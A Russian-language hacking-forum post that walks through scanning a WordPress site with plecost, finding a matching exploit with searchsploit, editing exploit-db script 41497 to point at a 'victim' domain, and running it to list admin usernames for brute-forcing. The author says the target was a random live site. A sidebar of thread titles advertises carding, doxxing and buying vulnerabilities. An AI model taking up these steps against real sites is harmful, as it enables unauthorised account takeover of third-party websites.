Ищем уязвимости в WordPress с помощью plecost

Forevonly

Original poster
Pro Member
Сообщения
599
Реакции
601
Посетить сайт
Всем привет!

Сегодня потестируем сканер безопасности Wordpress под названием plecost и проэксплуатируем одну небольшую уязвимость.

plecost по умолчанию установлен в kali.

Устанавливаем утилиту:

apt-get update

apt-get install python3-pip

python3 -m pip install plecost

cd /usr/bin/

rm plecost

ln -s /usr/local/bin/plecost plecost

Убеждаемся, что у нас установилась свежая версия 1.1.1:

plecost

c2e76af324c5485c5f975.png

Сканируем сайт с движком на WordPress:

plecost <Домен>

Я произвел сканирование одного случайного сайта на Wordpress, ссылку на который умышленно давать не буду.

Какую информацию дает на выходе утилита:

- версия WordPress и список ее уязвимостей;

- список установленных плагинов, их версии и уязвимости.

В моем примере был найден движок версии 4.5.0 с объемным списком дыр. А вот установленные плагины оказались безопасными.

8a3745844fa2ebafc9afb.png

Что делать дальше?

  1. Можно пробить все найденные уязвимости на

    Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

Например, эксплойт для уязвимости CVE-2016-6897 может выполнить DoS-атаку. Правда для его выполнения необходимо знать логин/пароль от админки.

f663807bf076ed2f13480.png

2. Можно поискать уязвимости в локальной базе Kali через searchsploit

Обновляем базу:

searchsploit --update

Ищем уязвимости для WordPress, исключаем из поиска уязвимости для плагинов и тем, так как в данном примере дыры не найдены:

searchsploit wordpress | grep -v Plugin | grep -v Theme

Изучив результаты видим, что для нашей версии 4.5.0 подходит эксплойт Username Enumeration. Давайте его запустим и найдем все логины!

cdd37c8849ebbcabc2a41.png

Копируем эксплойт на рабочий стол:

cd ~/Desktop

cp /usr/share/exploitdb/platforms/php/webapps/41497.php ~/Desktop/

Удаляем виндовый символ перевода каретки, иначе скрипт выдаст ошибку:

cat 41497.php | tr -d '\r' > exploit.php

Открываем exploit.php в редакторе.

В первой строчке исправляем ошибку: добавляем после ! знак /

Далее, переменной url задаем значение с доменом сайта жертвы. После домена обязательно ставим /, иначе скрипт откажется работать.

80b0d52027eebe33f1471.png

Сохраняем изменения и запускаем:

chmod +x exploit.php

./exploit.php

9e5a2fb6b4960654fdc57.png

В результате мы получаем список логинов для админки WP. Ура! Дальше можно в дело пускать брут.
 
  • Like
Реакции: VipRin1
Название темы
Автор Заголовок Раздел Ответы Дата
$ Ищем людей по направлениям хакинг, обмен и кардинг Ищу работу. Предлагаю свои услуги. 1
B Ищем Android разработчика! Предоставляю работу. Ищу специалиста. 0
D Ищем специалиста по ИБ и пентесту Предоставляю работу. Ищу специалиста. 1
slovokek Ищем пробивалу (mmn,ssn,dob) в команду под %. Предоставляю работу. Ищу специалиста. 0
MaFio Ищем регистрационные номера ПО Proxy/Прокси 0
slovokek Ищем в команду человека кто может писать проекты PK или бруты. Предоставляю работу. Ищу специалиста. 0
K Ищем страницы вк по лицу Полезные статьи 3
ExBOT Хакеры взломали ряд госорганов США с помощью еще одной уязвимости в ПО SolarWinds Новости в сети 0
H Как просканировать любое устройство на уязвимости? Уязвимости и взлом 1
Denik Интересно Хакеры используют уязвимости в почтовом приложении iOS для доступа к криптовалютным кошелькам Новости в сети 2
SSHMAN Hack the Web. Взламываем сайт. Используем и эксплуатируем уязвимости. Уязвимости и взлом 1
blazar В новых процессорах Intel нашли версию уязвимости Zombieload Новости в сети 1
M Проверено [ПОКУПКА] уязвимости / Buy vulnerabilities Куплю/Обменяю 0
MaFio Проекты ФСБ: от деанонимизации пользователей браузера Tor до исследования уязвимости торрентов Новости в сети 2
M Cisco исправила опасные уязвимости в промышленных и корпоративных решениях Новости в сети 0
Admin Усиливаем ddos атаки с помощью уязвимости в Memcached Полезные статьи 0
shooter В IoT-устройствах AGFEO обнаружены уязвимости Новости в сети 0
Renelio Серия коротких видео об уязвимости, взломе и способах защиты Полезные статьи 9
Admin Тестирования уязвимости в продукции Microsoft Office - CVE-2017-0199 Уязвимости и взлом 0
pw0ned Крадем учетные записи пользователей с помощью уязвимости Полезные статьи 0
Admin В PHP 7 обнаружены три серьезные уязвимости Новости в сети 0
Admin 0day-уязвимости в IP-камерах позволяют превратить устройства в IoT-ботнеты Новости в сети 0
Denik Интересно DDOS сайта при использовании WordPress Уязвимости и взлом 0
WorldBases World-Bases.com - лучшие базы на различных CMS: WordPress, Joomla, Magento, Drupal etc. Все что не подошло по разделу 10
B TGomatic — плагин для автоматической публикации постов в Telegram с WordPress сайта (2019) Spam/DDOS/Malware 0
АнАлЬнАя ЧуПаКаБрА INLINE Брут панелек WordPress Проекты Private Keeper 2
V WordPress Вопросы и интересы 1
Живой_мертвый Курсач по PHP и WordPress Другие ЯП 3
kdroshev Курс по сайтостроению 2017, на основе премиум шаблона для WordPress "AVADA" (Шаблон прилагается) Другое 0
kdroshev Мегапак шаблонов и плагинов для Wordpress и Woocommerce(2017) https://cloud.mail.ru/public/8J47/yCR2BqM2D/ Другое 0
Forevonly WPSeku-простой сканер тестирования Wordpress Kali Linux 0
itservice Настрою ленты плагина WPGrabber для WordPress Ищу работу. Предлагаю свои услуги. 6
Nicko77 10 советов по оптимизации кода вашего WordPress-шаблона для лучшей индексации контента сайта Другие ЯП 1
Nicko77 2500 шаблонов WordPress Другие ЯП 2
ins1der Брут-форс и эксплуатация скомпрометированных WordPress Уязвимости и взлом 0
Admin 15,7% ежедневных атак на сайты WordPress осуществляются из Украины Новости в сети 0
Admin Поиск конфигов WordPRESS для взлома Полезные статьи 0
Admin Уязвимость в плагине Mail Masta Plugin 1.0 для WordPress Уязвимости и взлом 0

Название темы